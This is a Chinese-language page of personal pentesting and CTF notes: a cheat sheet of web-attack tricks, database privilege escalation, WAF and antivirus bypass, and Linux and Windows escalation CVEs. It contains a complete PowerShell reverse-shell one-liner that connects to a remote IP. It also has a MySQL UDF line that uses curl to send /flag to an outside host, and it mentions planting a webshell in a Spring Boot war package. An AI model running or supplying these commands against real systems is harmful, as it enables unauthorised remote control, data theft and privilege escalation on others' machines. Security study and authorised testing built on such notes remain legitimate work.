一些笔记

收集看过的文章或者小trick,持续更新

web安全

  • eval("#".$cmd)除了可以用%0a换行绕过外,还可以用%0d,\r
  • flask debug重载覆盖main.py
  • 注入 pow溢出
  • qunie注入procedure analyse注入
  • JRMPListener测试shiro
  • DirectoryIterator突破open_basedir
  • sql注入if语句执行xp_cmdshell
  • python os.path.join()获取到的路径如果以/开头,无视前面的路径以参数开始向后拼接(rctf2022 filechecker)
  • flask堆栈读取secret_key (catctf2022 Cat cat)
  • 测试waf的时候fuzz一下ascii
  • IIS支持后缀ashx
  • 前端代码可能存在与数据库表名相同的字段,关注input里的id='xxx'
  • phpstudy特征:http响应体类似:Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
  • php中mail函数创造后门利用
  • ASP.NET aspx失败后可尝试asmx
  • 一些h5站点登录都无需验证码,目录扫描时可以xxx.com/h5-FUZZ
  • 路径穿越或文件读取时在路径结尾加#可能绕过防火墙
  • spring-boot下载war包添加马需要重启war包
    定时任务执行kill杀死当前进程 pkill -f ***.war
    java -Dfile.encoding=utf-8 -jar ***.war --spring.config.location=application.properties

数据库

mysql

mssql提权

  • xp_cmdshell,sp_oacreate,沙盒,CLR,xp_regwrite,SQL Server代理,R和python,差异备份
  • mssql绕过360上线
  • xp_cmdshell可尝试结合powershell下载文件执行命令,但是要注意转义

UDF提权

  • 直接读flag SELECT sys_eval('curl http://xx.xx.xx.xx:xxxx -d @/flag)'

waf

操作系统

windows

  • 存在目录别名,例如:PROGRA~2\WINDOW~2\ACCESS~1指代C:\Program Files (x86)\Windows NT\Accessories\
  • 远程连接时,为了使本地的程序或文件拷贝到远程的主机上,应在本地资源中勾选上驱动器

linux

  • 利用find特权命令执行命令时不需用引号包裹命令,find which find -exec ls / \;
  • $@可以绕关键词,例如ca$@t
  • /etc/ld.so.preload劫持命令执行 (RCTF filechecker)
  • 脏牛提权后防止web服务器死机
    echo 0 > /proc/sys/vm/dirty_writeback_centisecs
    echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn

渗透测试

可用CVE

ICMP RCE

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.232.128',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

win server 2012 R2

  • 提权:CVE-2020-0787 exe执行后新打开system权限cmd
  • 提权:ms16_075 juicy 烂土豆 可不免杀 cs中execute-assembly内存加载

linux

CVE-2022-2639-PipeVersion: core-11.1.0ubuntu2-noarch:security-11.1.0ubuntu2-noarch

应急响应

免杀

工具

发表评论